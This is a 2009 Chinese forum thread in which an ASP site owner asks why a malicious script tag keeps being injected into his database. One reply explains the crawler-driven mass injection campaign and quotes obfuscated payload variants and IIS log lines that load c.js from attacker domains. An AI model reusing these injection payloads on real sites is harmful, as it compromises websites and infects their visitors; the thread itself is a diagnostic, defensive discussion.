社区
ASP
帖子详情
数据库被注入
csover8
2009-07-06 06:08:13
求救,做了个网站,asp的,时不时地被人在数据库里注入这样的字符:<script src=http://3b3.org/c.js></script>
清完后,还是会。为何?
网站我并未用ewebeditor这个编辑器的。
...全文
67
5
打赏
收藏
数据库被注入
求救,做了个网站,asp的,时不时地被人在数据库里注入这样的字符: 清完后,还是会。为何? 网站我并未用ewebeditor这个编辑器的。
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
5 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
Dogfish
2009-07-07
打赏
举报
回复
代码严禁一下就可以。
lzp4881
2009-07-07
打赏
举报
回复
作好参数测试,数据过滤
csover8
2009-07-07
打赏
举报
回复
代码严禁一下?
楼上的要表达什么意思?
bing475879749
2009-07-06
打赏
举报
回复
最近一种新的挂马引擎开始出现,用GOOGLE搜索下com/c.js, 约有16,200个网站被挂马。
最终经过安全伞研究如下:
挂马引擎通过网页爬行技术不停的提交挂马代码,主要有%D3%AA%D1%F8<script%20src=http://3bomb.%63%6Fm/c.js></script>
中间部分不断变形
<script%20src=http://3b%6F%6Dbcom/c.js></script>
<script%20src=http://%33bomb.com/c.js></script>
IIS日志如下:
2009-01-20 09:18:25 W3SVC9 221.130.199.26 GET /xueyuan/list2.aspx name=%b2%df%c2%d4%3cscript+src%3dhttp%3a%2f%2f3b%256F%256Db.com%2fc.js%3e%3c%2fscript%3e 80 - 72.30.142.159 Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/debc07d3-3ccb-4676-ad90-144be37027e5.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/0a5d18e3-3018-47a2-ac57-99909ce5c58a.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /xcg/images/top_search.jpg - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 200 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/new_34528523.jpg - 80 - 116.5.162.127 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 200 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/510be59b-07fd-4868-87b7-d3cbc677f3a7.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/86181994-719e-440e-abc6-2e7e834b3ebc.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/2e60e9fe-1fa1-495d-8a64-d21a73ec1099.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/db7ed03e-0308-4a0f-9e82-86552f350f2f.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/221d7e7d-2e21-4cb2-a496-1c7627f200f9.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/e9928c0c-d27f-45ba-b873-09bbde17f58e.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/10364b4a-5dde-4d6d-a9e7-17efaf3983d4.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 21:07:14 W3SVC9 221.130.199.26 GET /food/List.aspx Title=%BD%A1%BF%B5<script%20src=http://3b%6F%6Db.com/c.js></script><script%20src=http://%33bomb.com/c.js></script> 80 - 202.160.179.83 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 302 0 0
该木马通过Cookie,GET,POST注入挂马,使用搜索引擎自动查找并注入网站,有点蠕虫的性质。
街头小贩
2009-07-06
打赏
举报
回复
不是只有编辑器可以注入的!要么你的空间主机有漏洞要么你的代码有漏洞
SQL
注入
漏洞演示源代码
SQL
注入
漏洞是网络安全领域中的一个重要话题,它涉及到
数据库
管理和Web应用程序的安全性。在这个"SQL
注入
漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL
注入
是通过输入恶意的...
啊D
注入
工具 2.32 纯净版
对"MSSQL显错模式"、"MSSQL不显错模式"、"Access"等
数据库
都有很好
注入
检测能力,内集"跨库查询"、"
注入
点扫描"、"管理入口检测"、"目录查看"、"CMD命令"、"木马上传"、"注册表读取"、"旁注/上传"、"WebShell管理"于...
啊D
注入
工具无限制版
【啊D
注入
工具无限制版】是一款在网络安全领域中广泛使用的
数据库
漏洞检测工具,主要用于测试Web应用程序中的SQL
注入
漏洞。SQL
注入
是一种常见的攻击手法,通过输入恶意SQL代码,攻击者可以获取、修改、删除
数据库
中...
SpringMVC+Mysql实例详解
SpringMVC是Spring框架的一部分,专门用于构建Web应用程序。...通过这个实例,你可以了解如何利用SpringMVC的注解驱动、依赖
注入
特性,以及如何与MySQL
数据库
无缝集成,为开发高效、健壮的Web应用奠定基础。
Android通过webservice连接Sqlserver实例
同时,对用户输入进行验证,防止SQL
注入
攻击。 在提供的压缩包文件中,"StockManageWebservice"和"StockManagement"可能是相关的源代码示例。"StockManageWebservice"可能包含服务器端的WebService实现,用于管理...
ASP
28,406
社区成员
356,946
社区内容
发帖
与我相关
我的任务
ASP
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
复制链接
扫一扫
分享
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章